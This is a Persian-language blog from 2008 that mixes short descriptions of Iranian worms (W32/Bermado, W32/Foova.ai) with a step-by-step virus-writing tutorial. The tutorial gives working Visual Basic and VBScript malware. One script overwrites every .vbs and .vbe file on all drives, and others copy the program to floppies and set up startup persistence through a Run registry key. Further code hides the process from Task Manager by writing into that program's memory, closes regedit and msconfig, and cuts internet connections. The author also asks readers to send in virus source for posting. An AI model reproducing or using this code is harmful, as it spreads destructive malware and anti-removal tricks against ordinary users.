كرم W32/Bermado :

این کرم 602142 ایرانی خودش را به شکل های زیر کپی می کند

%UserProfile%\SendTo\Svchost.exe

کار دیگر این کرم ایجاد یک کرم دیگر از همین گونه با نام W32/Bermado.b است که حجم آن 4076 است

%UserProfile%\SendTo\SOUNDMAX.EXE

این ورم برای اجرای خود در هر بار راه اندازی کلید زیر را ایجاد می کند :

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
SOUNDMAX = %UserProfile%\SendTo\SOUNDMAX.EXE

این ورم با استفاده از کلید های زیر اجازه نمایش فایل های مخفی می گیرد ،

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden
CheckedValue = 0x00000000
UncheckedValue = 0x00000000

برای بر طرف سازی اثرات تخريبی اين کرم می توانيد از برنامه ی زير استفاده کنيد

::دانلود کنید::

آیکون این ورم شبیه فولدر است ممکن است توسط کاربر اجرا شود  با وارد شدن به هر پوشه ای آن پوشه را مخفی می کند

تصویری به شکل زیر درون این کرم وجود دارد که برای تغییر شکل درایو ها استفاده می کند:

 نوشته شده در  چهارشنبه دوازدهم تیر 1387 ساعت 22:4 ارسال شده توسط :  F@rshid

یکی از راه های قدیمی ولی پرکاربرد ویروس ها برای منتشر شدن،فلاپی است.اگر ویروستان به کافی نت یا دیگر کامپیوتر های عمومی راه یافت و این قابلیت را داشت،می تواند به راحتی منتشر شود.کدهای زیر را در یک timer  کپی کنید:

On Error GoTo h

Set fso = CreateObject("Scripting.FileSystemObject")

mf = App.Path & "\" & App.EXEName & ".exe"

If Dir("A:\" & "virus.exe") = "" Then

FileCopy mf, "A:\" & "virus.exe"

End If

h:

توضیح کدها:

در خط اول می گوید که اگر برنامه error پیدا کرد،آن را به خط آخر منتقل کند.خط دوم هم که می دانید.در خط سوم،ویروس مسیر فایل خودش را می گیرد که برای کپی کردن خودش درون فلاپی نیاز است.در خط چهارم می گوید که اگر در فلاپی فایلی به نام virus.exe وجود ندارد،خودش را با نام virus.exe در فلاپی کپی کند.

 نوشته شده در  سه شنبه یازدهم تیر 1387 ساعت 18:58 ارسال شده توسط :  F@rshid

اين ويروس يک نمونه از ويروس هاي vbs است که فايل هاي vbs و vbe کامپيوتر را آلوده مي کند و ساختاري بسيار ساده دارد ولي در بعضي موارد مي تواند بسيار خطرناک باشد.

ساخت ويروس:

براي ساخت ويروس کدهاي زير را در notepad ويندوز کپي کنيد.سپس از منوي فايل گزينه ي save as را انتخاب کنيد و در کادر filename نام دلخواهتان را وارد کنيد ولي بعد از نام حتما" بنويسيد:

.vbs يا .vbe

مثلا" اگر مي خواهيد نام آن را Biosan بگذاريد،در کادر بنويسيد:

Biosan.vbs يا Biosan.vbe

On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.is ready Then
folderlist(d.path&"\")
end if
Next
end sub
sub infectfiles(folderspec)
On Error Resume Next
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
if (ext="vbs") or (ext="vbe") then
set ap=fso.Opentextfile(f1.path,2,true)
ap.write vbscopy
ap.close
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub

 نوشته شده در  سه شنبه یازدهم تیر 1387 ساعت 18:50 ارسال شده توسط :  F@rshid

اين کدها باعث مي شود از کارت صداي کامپيوتر صداي beep بيايد.ابتدا اين کدها را در قسمتgeneral  کپي کنيد:

Private Declare Function GetTickCount& Lib "kernel32" ()
Private Declare Function Beep Lib "kernel32" (ByVal dwFreq As Long, ByVal dwDuration As Long) As Long

يک تايمر درست کنيد و اين کد ها را درونش بنويسيد.

 نوشته شده در  سه شنبه یازدهم تیر 1387 ساعت 18:49 ارسال شده توسط :  F@rshid

در اين پست به شما ياد ميدم که چه طور هر نوع اتصال انترنت رو قطع کنيد.فقط کافيه يه timer با interval مناسب درست کنيد و درونش کد زير رو کپی کنيد.

Call Shell("rundll32 iedkcs32.dll,CloseRASConnections")

 نوشته شده در  سه شنبه یازدهم تیر 1387 ساعت 18:49 ارسال شده توسط :  F@rshid

یکی از راه های غیر فعال کردن ویروس ها،regedit و msconfig می باشد.با این دو برنامه ای که در ویندوز وجود دارد،می توان کاری کرد که ویروس،در هر بار اجرای ویندوز،اجرا نشود.در run 

عبارت regedit یا msconfig را تایپ کنید تا این برنامه اجرا شوند.

برای غیرفعال کردن این دو برنامه کارهای زیر را انجام دهید:

ابتدا کدهای زیر را در قسمت general کپی کنید:

Private Declare Function SendMessage Lib "user32.dll" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long

Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long

حالا این کدها را در یک timer کپی کنید:

Dim reghwnd As Long

Dim syshwnd As Long

 Const WM_CLOSE = &H10

syshwnd = FindWindow(vbNullString, "System Configuration Utility")

reghwnd = FindWindow("RegEdit_RegEdit", vbNullString)

If syshwnd <> 0 Then SendMessage syshwnd, WM_CLOSE, 0&, 0&

 نوشته شده در  سه شنبه یازدهم تیر 1387 ساعت 18:48 ارسال شده توسط :  F@rshid

در پست قبلی شاید اصلی ترین چیز رو در ویروس نویسی یاد گرفتیم.حال قسمت دوم آموزش رو می خوایم بدیم که اون مخفی کردن ویروسه.مخفی کردن form و مخفی کردن ویروس رو در لیست task های taskmanager یاد گرفتید.حالا می خوایم مخفی کردن ویروس رو در لیست process های taskmanager،آموزش بدیم.هر ویروسی قادر به این کار نیست و فقط ویروس های جدید می تونن این کارو انجام بدن.برای این کار باید ابتدا vb رو اجرا و بعد standard exe رو انتخاب کنیم و سه مرحله کار انجام بدیم:

مرحله ی اول:

اول این کدها رو در قسمت  general کپی کنید

Private Type bkh flag As Long psz As Long lParam As Long pt As Long vkDirection As Long End Type Private Declare Function VirtualAllocEx Lib "kernel32.dll" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long Private Declare Function OpenProcess Lib "kernel32.dll" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long Private Declare Function GetWindowThreadProcessId Lib "user32.dll" (ByVal hwnd As Long, ByRef lpdwProcessId As Long) As Long Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Long, ByVal lpBuffer As Long, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long Private Declare Function VirtualFreeEx Lib "kernel32.dll" (ByVal hProcess As Long, ByRef lpAddress As Any, ByRef dwSize As Long, ByVal dwFreeType As Long) As Long Private Declare Function SendMessage Lib "user32.dll" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long Private Declare Function GetCurrentProcessId Lib "kernel32.dll" () As Long Private Declare Function KillTimer Lib "user32.dll" (ByVal hwnd As Long, ByVal nIDEvent As Long) As Long Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long Private Declare Function FindWindowEx Lib "user32.dll" Alias "FindWindowExA" (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long

مرحله ی دوم:

حالا این کدها رو جدا از قسمت form_load و general کپی کنید که خودش یک قسمت باشه:

Private Sub Hide_Process(Name As String) Dim pName As Long Dim pType As Long Dim l As Long Dim Tid As Long Dim hTid As Long Dim pid As Long Dim h As Long Dim i As Long Dim hProcess As Long Dim f As bkh Dim s As String Dim bkh() As Byte h = FindWindow(vbNullString, "Windows Task Manager") KillTimer h, 0 h = FindWindowEx(h, 0, "#32770", vbNullString) h = FindWindowEx(h, 0, "SysListView32", vbNullString) If h = 0 Then Exit Sub f.flag = 8 Or &H20 Call GetWindowThreadProcessId(h, pid) hProcess = OpenProcess(1082, 0, pid) bkh = StrConv(Name, vbFromUnicode) pName = VirtualAllocEx(hProcess, 0, Len(Name) + 1, &H1000, 4) WriteProcessMemory hProcess, pName, VarPtr(bkh(0)), Len(Name), l f.psz = pName pType = VirtualAllocEx(hProcess, 0, Len(f), &H1000, 4) WriteProcessMemory hProcess, pType, VarPtr(f.flag), Len(f), l i = SendMessage(h, &H1000 + 13, 0, pType) If i <> -1 Then SendMessage h, &H1000 + 8, i, 0 VirtualFreeEx hProcess, pType, Len(f), &H8000 VirtualFreeEx hProcess, pName, LenB(Name) + 1, &H8000 End Sub

مرحله ی سوم:

حال یک timer با interval مناسب(مثلا" 1) درست کنید و کد زیر رو در timer قرار بدید:

Hide_Process CStr(App.EXEName & ".exe")

در این جا باید بگم که منظور از app.exename،نام فایلی ویروس است و اگر نام فایلتان را مثلا" h بذاری،app.exename هم h می شود.حال ما ویروسی رو داریم که در لیست process های taskmanager مخفی است و از حالت اجرا درآوردن ویروس رو بسیار بسیار سخت میکنه.در پست های بعد غیرقابل حذف شدن ویروس رو آموزش میدم.

 نوشته شده در  سه شنبه یازدهم تیر 1387 ساعت 18:42 ارسال شده توسط :  F@rshid

یک ویروس برای اینکه بتونه کارهای مخربش رو انجام بده،باید هر لحظه اجرا باشه.یعنی از زمانی که ویندوز بار گزاری میشه تا وقتی که از ویندوز خارج می شویم.هر ویروسی باید خونه ای داشته باشه و تو اونجا زندگی کنه و خونه اش جایی باشه که نه کاربر به اون دسترسی داشته باشه و نه حذف بشه.پس بهترین جا،پوشه ی ویندوز است که بعضی ها از رفتن به آن خودداری می کنند زیرا می ترسن ویندوزشون خراب بشه.خوب،کار بعدی اینه که ویروس،هر بار ویندوز اجرا شد،اجرا بشه که این کمک می کنه تا ویروس،هر کاری بخواد بکنه.اول Visual Basic رو اجرا کنید و بعد standard exe و بعد هم در قسمت form_load کدهای زیر رو بنویسید.

Me.hide App.taskvisible = false Set fso = CreateObject("scripting.filesystemobject") Set windir = fso.getspecialfolder(0) file = App.Path & "\" & App.EXEName & ".exe" FileCopy file, windir & "\" & App.EXEName & ".exe" file2 = windir & "\" & App.EXEName & ".exe" Set Reg = CreateObject("wscript.shell") Reg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\run\autoupdate", file2

اگه از کدهای vb سردر نمیارید براتون توضیح میدم.

در خط اول کدی را وارد کردیم که باعث می شود form برنامه،در حین اجرا مخفی باشد و خط دوم باعث می شود تا برنامه،در لیست task های taskmanager مخفی باشد.در پست های بعد،آموزش مخفی کردن ویروس در لیست process های taskmanager رو می دم.در خط سوم،ما شئی fso رو برای دسترسی به فایل ها،فولدرهاو ...به برنامه معرفی کردیم.اگه این کارو نکنیم از قابلیت های این شئی برخوردار نمی شویم.در خط چهارم،از متد getspecialfolder برای بدست آوردن پوشه های حساس ویندوز استفاده می کنیم.اگه به جای صفر،یک بذاریم پوشه ی system 32 را به ما می دهد و اگر 2 بذاریم،پوشه ی temp ویندوز رو میده.در خط پنجم،مسیر فایل خودمون رو بدست آوردیم و اگه این کارو نکنیم،نمی تونیم فایل یا ویروسمون رو کپی کنیم.در خط ششم فایل را کپی کرده و در خط هفتم مسیر فایل کپی شده را به برنامه می دهیم چون برای گذاشتن مسیر فایل در ریجیستری به آن نیاز مندیم و در خط بعدی،شیئی را به برنامه معرفی کرده ایم که باعث می شود بتوانیم به ریجیستری دسترسی داشته یاشیم و در خط آخر هم،مسیر فایل کپی شده را در قسمتی خاص در ریجیستری می گذاریم.ریجیستری مکانی است که حیات ویندوز به آن وابسته است و کارهای اصلی ویندوز به وسیله ی آن صورت می گیرد و برای دسترسی به ریجیستری در run عبارت regedit رو تایپ کنید.

امیدوارم از این مطالب،لذت برده باشید.

 نوشته شده در  سه شنبه یازدهم تیر 1387 ساعت 18:30 ارسال شده توسط :  F@rshid

سلام به دوستان عزیزم که این ویلاگ رو مشاهده می کنند ولی نظر نمیدن .....
و یک خبر خوب یا بد برای کسانی که این وبلاگ و مطالبش رو دوسـت دارن .....

یکی از دوستان برای من ایمیل فرستاده بود که گفته بود دلش میخواد ویروس نویس بشه .
حالا چرا نمیدونم شاید می خواسته سیستم دوست دخترشو خراب کنه ...

خوب منم تصمیم گرفتم از این به بعد تو این وبلاگ بجز مطالبی که برای حفظ شما از دست ویروسها می نویسم آموزش ساخت ویروس هم به شما بدم .

اما چرا تصمیم گرفتم آموزش ویروس نویسی بدم ؟
یکی از راه ها برای مقابله با ویروس آشنایی کامل با ویروس هست اگه خودتون بتونید ویروس بسازید می توانید با ویروس ها مقابله کنید در ضمن من سعی می کنم سورس ویروسهای مشهور یا کمی مشهور رو براتون بزارم تا ببینید چه جوری ساخته شده و خودتون برای ساختن آنتی ویروس آن تلاش کنید

ویروس ها را چطور میسازیم ؟
اولین چیزی که باید بگم اینه که ما ویروس هایمون رو چطور می سازیم.ویروس ها رو تو این وبلاگ یا با vbs و یا ویژوال بیسیک و یا با vb خواهیم ساخت که اول از Visual basic شروع می کنیم. پس حتما" برنامه ی Visual Basic رو تهیه کنید.

در ضمن اگه خود شما ویروس نویس هستید و ویروسها ی جالب ساختید سورس ویروس را برای ما ارسال کنید تا با نام شما در وبلاگ قرار بدم تا دوستان دیگر استفاده کنند .

 نوشته شده در  شنبه هشتم تیر 1387 ساعت 20:9 ارسال شده توسط :  F@rshid

كرم W32/Foova.ai :

این کرم ایرانی خودش را در مسیرهای زیر کپی می کند

C:\ChamranPartC.exe
D:\ChamranPartD.exe
%WinDir%\system32\Chamran.exe
%WinDir%\system32\Cmd-Nk27.exe
%WinDir%\system\Shell32B.exe
%WinDir%\Dl.exe
%WinDir%\Mastore32.dll
%Temp%\FooVA-X27.ExE
%Temp%\~DFC8EC.tmp
%Temp%\~DF4831.tmp

از کارهایی که ورم W32/Foova.ai بر روی سیستم انجام می دهد درون فایل زیر گزارشی از تکثیر این ورم تهیه می کند

%Temp%\Help-X27.txt

پیامی به شکل زیر نمایش می دهد

بر روی صفحه نمایش صفحه‌ای شبیه به شکل زیر نمایش می دهد

برای اجرای خود در هر بار راه اندازی کلید زیر را ایجاد می کند

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Yahoo! =%WinDir%\system\Shell32B.exe -BooT

با تبلیغ سایت http://www.persiancod.com لینک های فریبنده زیر را نمایش می دهد

Fun - Sex And Love In This Pack
Fun - Sex And Love In This Site
For DL Sexy Site Use This Site
Israel Atack Or Iran Atack
Ye Dler Khob ba Sorate Ziad . Dl e Sh Kon
Anti Filter Ba Sorate Bala ... Ta Link Kharab NaShode DlKon
To in link Ye Harfie Ke Hamishe Mikhastam behet Bezanam
BaVar Kon Mitonam Dostesh Dashte Basham .. Bebin
Anti Virus e Virus Jadid Yahoo ....
Aks Hai Jaleb Yek Masol ! Midonam ke Bavaret Nemishe
Esmesh Ali Reza Hast Age Khasti Az Pack Ba Karash AshnaSHoo
Nazart Darbare In Chand Ta Aks Ba Hal Chie ?
Sexy - Sexy - Anal _Fuck_ In 1 Pack
Diaz ! No .Not .U BaD
Iran-Israel-USE-Iraq War Animat Picture
In Chi Hastesh !!Han? .. Dige Az In Aks Ha Baram Nafrest.. Fahmidi Ya Na ?! ...Ina
Ro Migam.Enkar Nakon .Barat Mote Asefam
Pliz DL Anti Yahoo Virus -->
Aks Jadidam Ro GoZashtam -- To Ham Akset Ro Bezar :)
I Love You .
Ye RooZ Be U Migam ..Ama Aval ino Nega Kon . Be Kasi HamNago
RooM Full Kon
Ba Har ID Khsti bia To Room
Kafet Mibore
Aks 4shanbe Sroi Az Raghse Mostarak DAr Shiraz
Eedam Arazel Dar Shiraz . Mostanad

 نوشته شده در  پنجشنبه ششم تیر 1387 ساعت 10:47 ارسال شده توسط :  F@rshid